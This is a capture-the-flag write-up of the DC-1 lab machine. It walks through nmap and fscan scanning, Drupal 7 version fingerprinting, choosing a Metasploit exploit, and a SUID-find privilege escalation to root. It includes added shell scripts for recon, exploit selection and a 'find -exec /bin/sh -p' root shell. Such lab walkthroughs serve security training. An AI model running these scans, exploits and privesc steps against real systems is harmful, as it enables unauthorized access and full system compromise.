DC-1
author: leadlife
date: 2023/5/11
blog: Tripse Blog
note: the box is meant to have you collect every flag; I didn't bother with that here, anyone interested can go and find them.
Tools used in this test:
Information gathering: nmap, fscan, cmseek, searchsploit
Getting a SHELL: MSF
Internal information gathering: none
Privilege escalation: none
External information gathering
Nmap ping sweep to discover hosts (-sP is the old spelling of -sn; run as root on a local segment it is really an ARP sweep, which is why the MAC addresses show up)
10.10.10.128 is our target box
sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000
leadlife@endeavrouOS ~/p/DC1> sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 18:31 CST
Nmap scan report for 10.10.10.128
Host is up (0.00011s latency).
MAC Address: 08:00:27:0C:90:9D (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.254
Host is up (0.000025s latency).
MAC Address: 00:50:56:EC:CF:01 (VMware)
Nmap scan report for 10.10.10.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 0.43 seconds
fscan to probe open ports (the upper bound is 65535; 66535 is outside the 16-bit port range)
sudo fscan -h 10.10.10.128 -p 1-65535 -t 30
Detailed nmap scan of the ports fscan found
sudo nmap -sS -T4 -sV -O -p22,80,111,50387 --min-rate 10000 -oN namp.all 10.10.10.128 -sC
# Nmap 7.93 scan initiated Thu May 11 18:27:05 2023 as: nmap -sS -T4 -sV -O -p22,80,111,50387 --min-rate 10000 -oN namp.all -sC 10.10.10.128
Nmap scan report for 10.10.10.128
Host is up (0.00021s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4d659e6774c227a961660678b42488f (DSA)
|   2048 1182fe534edc5b327f446482757dd0a0 (RSA)
|_  256 3daa985c87afea84b823688db9055fd8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Welcome to Drupal Site | Drupal Site
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35804/udp6  status
|   100024  1          41727/udp   status
|   100024  1          50387/tcp   status
|_  100024  1          52241/tcp6  status
50387/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:0C:90:9D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 11 18:27:20 2023 -- 1 IP address (1 host up) scanned in 15.41 seconds
Three things in this output matter for what follows: the OpenSSH package string (4+deb7u7) pins the box to Debian 7, the http-generator header already says Drupal 7, and robots.txt lists /CHANGELOG.txt, which a Disallow line does nothing to protect.
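The three recon stages above (host discovery, full port sweep, service scan on the open ports) chained so the port list is never retyped by hand. This is an added example, not code from the original post; it assumes nmap is installed, that we run as root, and that the target sits in a /24. fscan from the post is replaced here by nmap's own -p- sweep so that one tool's grepable output feeds the next step. The sample -oG lines are constructed to match the scan results shown.

```shell
#!/bin/sh
# Added example (not from the original post): recon pipeline for a single target.
# Assumes nmap, root privileges (for -sS/-O) and a /24 around the target.

# Reduce nmap grepable (-oG) output on stdin to a comma-separated list of open
# TCP ports, e.g. "22,80,111,50387", ready for a -p argument. A -oG host line:
#   Host: 10.10.10.128 ()<TAB>Ports: 22/open/tcp//ssh///, 80/open/tcp//http///<TAB>Ignored State: closed (65531)
# Filtered/closed entries and non-TCP entries are dropped.
extract_ports() {
    grep '^Host:' | sed -n 's/.*Ports: //p' | tr ',' '\n' |
        sed 's/^[[:space:]]*//' |
        awk -F/ '$2 == "open" && $3 == "tcp" { print $1 }' |
        sort -n | tr '\n' ',' | sed 's/,$//'
}

# Run the whole sequence against one live host (not exercised offline).
run_recon() {
    target=$1
    nmap -sn "${target%.*}.0/24" -oN hosts.txt                # -sn (formerly -sP): ARP sweep on a local segment
    nmap -sS -p- --min-rate 10000 -oG ports.gnmap "$target"   # every TCP port, grepable output for the next step
    ports=$(extract_ports < ports.gnmap)
    [ -n "$ports" ] || { echo "no open TCP ports on $target" >&2; return 1; }
    nmap -sS -sV -sC -O -p "$ports" -oN nmap.all "$target"     # versions, default scripts, OS guess on just those ports
}

# Only touch the network when TARGET is set, e.g.  TARGET=10.10.10.128 sh recon.sh
if [ -n "${TARGET:-}" ]; then
    run_recon "$TARGET"
fi
```

Keeping the service scan restricted to ports the sweep actually found is what makes -sV -sC cheap enough to run at -T4 without tripping over the OS-detection warning for lack of a closed port more than once.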
Identifying the CMS
Opening the site shows it is Drupal (the generator meta tag in the nmap output already said "Drupal 7")
CMSeek to determine the CMS version
searchsploit to look for exploits for that version
searchsploit drupal 7
There are exploitable entries whether the install is version 7 itself or a release above or below it, so we turn to msf and try them
Getting a SHELL
Exploitation attempts with MSF
In a real engagement you would not fire the exploits one after another like this; pin down the details (exact release, patch state) first and use the one exploit that fits
The first exploit in the list (number 1) gave us a SHELL
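Pinning down the exact release before picking an exploit, as the previous step recommends, and as an added example that is not part of the original post. Drupal 7 prints its major version in the Generator meta tag and ships CHANGELOG.txt in the docroot with the exact release on its first line ("Drupal 7.xx, YYYY-MM-DD"); the robots.txt Disallow seen in the scan does not stop a direct GET. The functions below parse both, then compare the release against the "< 7.xx" bound that searchsploit titles usually carry. `fingerprint` assumes curl and searchsploit are installed; the HTML and CHANGELOG inputs in the test are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): exact-version fingerprinting of a
# Drupal 7 target so that one exploit can be chosen instead of all of them.

# Major version from the Generator meta tag, e.g. "7".
drupal_major() {
    sed -n 's/.*<meta name="Generator" content="Drupal \([0-9][0-9]*\).*/\1/p' | head -n 1
}

# Exact release from CHANGELOG.txt, whose first line reads "Drupal 7.24, 2013-11-20".
drupal_release() {
    sed -n 's/^Drupal \([0-9][0-9.]*\),.*/\1/p' | head -n 1
}

# Dotted version compare: version_lt 7.24 7.58 succeeds, version_lt 7.58 7.58 fails.
# Used to check a release against the "< 7.58"-style bound in an exploit title.
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        for (i = 1; i <= (n > m ? n : m); i++) {
            if ((x[i] + 0) < (y[i] + 0)) exit 0
            if ((x[i] + 0) > (y[i] + 0)) exit 1
        }
        exit 1
    }'
}

# Live fingerprint (assumes curl and searchsploit; not run offline).
# Admins sometimes delete CHANGELOG.txt, in which case only the major survives.
fingerprint() {
    base=$1
    major=$(curl -fsS "$base/" | drupal_major)
    release=$(curl -fsS "$base/CHANGELOG.txt" | drupal_release)
    echo "major=${major:-?} release=${release:-?}"
    # List candidates for the major; check each title's upper bound with version_lt
    # before choosing, e.g.  version_lt "$release" 7.58
    [ -n "$major" ] && searchsploit drupal "$major"
}
```

With the release in hand the msf module selection stops being a guess: an entry whose title says "< 7.58" is only worth loading if `version_lt "$release" 7.58` succeeds.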
Internal information gathering
Groundwork for the privilege escalation that follows
Kernel and distribution
SUID
find is SUID here, so it can be used to escalate
SUDO
There is no sudo on the box
www-data@DC-1:/var/www$ sudo -l
bash: sudo: command not found
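The two checks above (sudo, then SUID) done in one pass, with the find case carried through to a root shell. This is an added example, not commands from the original post. The list of binaries that hand over a root shell when SUID is a subset of the GTFOBins SUID entries, chosen here as the ones worth checking first; the path list in the test is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): post-exploitation checks for a
# low-privilege shell, sudo first, then SUID binaries, then the find abuse.

# Binaries that give a root shell when SUID root (subset of the GTFOBins SUID list).
GTFO_SUID="find vim nmap python perl bash env awk less cp mv"

# Read candidate paths on stdin, print the ones whose basename is on the list.
suid_candidates() {
    while IFS= read -r p; do
        name=${p##*/}
        for g in $GTFO_SUID; do
            [ "$name" = "$g" ] && { echo "$p"; break; }
        done
    done
}

# Confirm a file is really setuid AND owned by root before spending time on it.
is_suid_root() {
    [ -u "$1" ] && [ "$(ls -ld "$1" | awk '{ print $3 }')" = "root" ]
}

# Enumeration on the target: sudo may simply be absent, as on this box, so fall
# through to the SUID search instead of stopping at "command not found".
enum_privesc() {
    if command -v sudo >/dev/null 2>&1; then
        sudo -n -l 2>/dev/null || echo "sudo present but no password-less rules"
    else
        echo "no sudo binary"
    fi
    find / -perm -4000 -type f 2>/dev/null | suid_candidates
}

# find SUID root: -exec runs /bin/sh with euid 0. "-p" keeps the effective uid in
# bash; dash (Debian's /bin/sh) does not drop it anyway. -quit stops after the
# first match so only one shell is spawned.
find_root_shell() {
    find . -exec /bin/sh -p \; -quit
}
```

Run `enum_privesc` first; if `/usr/bin/find` is printed and `is_suid_root /usr/bin/find` succeeds, `find_root_shell` drops into a shell with euid 0 (check with `id`).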